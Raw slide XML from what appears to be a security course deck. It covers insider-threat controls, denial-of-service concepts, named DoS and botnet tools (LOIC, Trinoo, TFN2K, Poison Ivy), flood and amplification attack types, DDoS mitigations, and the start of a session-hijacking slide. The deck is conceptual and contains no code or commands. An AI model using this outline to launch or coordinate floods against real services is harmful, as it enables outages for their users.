              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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8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 Prevention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485" name="Google Shape;485;p80"/>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Education!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Separation of duties</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Rotation of duties</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Controlled access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Logging &amp; Auditing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Policies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Not keeping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>archive</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81"/>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DoS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="Google Shape;491;p81"/>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914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Understanding DoS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Disable resource</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Disable infrastructure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Signs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Unavailable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> resource</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Loss of access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="1371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Slow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DDoS (Zombies)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Google Shape;492;p81"/>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SzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DoS Tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DoSHTTP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>UDPFlood</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Jolt2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Targa</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DDoS / Botnet Tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Shark</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PlugBot</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Poison Ivy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>LOIC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Trinoo</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>TFN2K</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stacheldraht</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82"/>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a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Google Shape;498;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4066575" y="308325"/>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Fragmentation (server can not rebuild packets). L4</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>TCP-STATE exhausting (just sending SYN!)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>UDP flooding (forcing a lot of destination unreachable ansewrs). L4</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DNS, NTP, SSDP, SNMP, …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ICMP (hping flood, ping of death (large))</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SMURF (reverse ICMP flood)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fraggle (SMURF with UDP)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>LAND (send traffic to traget with its own source! :) )</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PDoS (permanent DoS). Phlashing (updating firmwares -&gt; bricking)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Using Social media and ask people to attack using LOIC or JS LOIC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application layer (say requesting large searches)</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Volumetric (too much request)</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Buffer Overflow</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="499" name="Google Shape;499;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="438500" y="1584650"/>
            <a:ext cx="3094149" cy="24576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8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505" name="Google Shape;505;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4066575" y="308325"/>
            <a:ext cx="4699800" cy="4026600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>UTM/IPS can have reputation based filtering</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Rate limiting / Throttling</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Reverse Proxy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>TCP Intercept. Firewall can reply to SYN and forward to server when there is a valid connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web Application Filtering (WAF). Will check if the request is valid and not fishy! WAF can do the HTTPS termination</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Load Balancing / Application Delivery Controller (like BigIP F5)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sandboxing on application. Will prevent one DoS from Downing everything</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Having challenges (Captcha, Validate browser with JS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>There are cloud services for preventing and attacking (sold as IP Stressers/DDoSer/Booter/ dark web)</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a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506" name="Google Shape;506;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535600" y="1267850"/>
            <a:ext cx="3030300" cy="4026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
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reduce Attack Surface</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Search for DDoS runbook checklist</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOP is 0x90</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>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84"/>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Session H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ijack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="Google Shape;512;p84"/>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marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>It is like h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ijack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ing ATM after you provided your password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
